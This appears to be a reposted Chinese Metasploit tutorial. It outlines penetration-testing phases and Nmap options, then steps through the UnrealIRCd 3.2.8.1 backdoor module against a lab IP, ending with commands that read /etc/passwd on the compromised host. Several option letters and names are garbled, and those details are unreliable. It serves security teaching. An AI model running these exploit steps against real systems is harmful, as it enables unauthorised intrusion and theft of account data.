3.Metasploit攻擊流程及命令介紹


Metasploit 進階第一講    攻擊流程及命令介紹

 

01.滲透測試過程環節(PTES

 

1.前期交互階段:與客戶組織進行交互討論,確定范圍,目標等

2.情報搜集階段:獲取更多目標組織信息,NmapNessus

3.威脅建模階段:理清頭緒,確定出最可行的攻擊通道

4.漏洞分析階段:搜索可獲取的滲透代碼資源

5.滲透攻擊階段:找出安全漏洞,入侵系統

6.后滲透攻擊階段:你想干什么,Mctcrprctcr

7.報告階段:滲透測試報告

 

 

 

02. Metasploit漏洞利用環節

 

情報搜集階段

 

外圍信息搜索   -    Google Hacking等

主機探測與端口掃描          -Nmap等

服務掃描       -auxiliary/scanner/tclnet/…等(見目錄)

網絡漏洞掃描   -OpenVAS、Nessus等

 

情報搜集階段—Nmap

格式:nmap<掃描選項,<掃描目標>

 

·掃描選項:指定掃描方式      ·掃描目標:

-sn         -探測存活主機,不掃描端口                         單個p地址

-o                  -目標操作系統識別                                          多個p地址,用逗號分割(,)

-sV         -詳細服務版本信息                                         連續ip地址,用連字符號(-)

-f                   -快速掃描                                                    CIDR表示,192.168.22.0/24

-sT/-sS/-sA                 -全連接/syn掃描/ack掃描,

同auxiliary/scanner/portscan/..模塊

-sU                              -udp端口掃描了

-p<端口范圍>           指定掃描端口

 

  

Nmap  –sV  -o  192.168.24.139

 

狀態:

open 應用程序正在此端口監聽

closed 主機響應,無應用程序監聽

filtered 不確定是否開放

unfiltered 無法確定端口是否開放(僅出現在ack掃描時)

 

 

nmap  -A  -p  6667   192.168.24.139

 

 

 

情報搜集階段--其他姿勢

 

 

 

 

漏洞分析階段

 

IRC:“Internet Rely Chat”的縮寫,網絡中繼聊天,通過網絡的即時交流工具。

IRC運作方式:是一種分布式的客戶端/服務器的結構,一個IRC服務器內部包含多個IRC頻道,這些頻道和qq群類似。若頻道不是保留頻道且頻道中無人,該頻道就會消失,而想加入某個頻道,若頻道名不存在,則會創建這個頻道,創建者為管理員,頻道內部可私聊。

IRC端口:服務器端口:6667,客戶端端口:6697,連接使用的是SSL。

 

1.msfconsole             -啟動metasploit框架

 

2.search unreal ircd3.2.8.1     -在metasploit框架中查詢相關模塊

 

3.info exploit/unix/irc/unreal_ircd_3.2.8.1_backdoor  -查看模塊信息,命名規則:模塊類型/目標平台/目標服務/模塊名稱

 

4.cat/usr/share/metasploit-framework/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb         -查看源代碼(也可在目錄中查看)

 

滲透攻擊階段

 

1.use exploit/unix/irc/unreal_ircd_3281_backdoor             -使用該模塊

2.show  options    -查看需配置的參數(Required為yes的選項必須配置)

3.set  rhosts  192.168.24.139     -配置目標ip地址

4.run/exploit   -運行該模塊

5.whoami;cat/etc/passwd      -成功后查看目標主機信息

 

 

Metasploit漏洞利用流程總結

 

Metasploit命令:

 

1.     msfconsole

2.     search相關模塊

3.     use模塊路徑

4.     show  options

5.set <參數名稱> <參數信息

6.run/exploit

7..

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM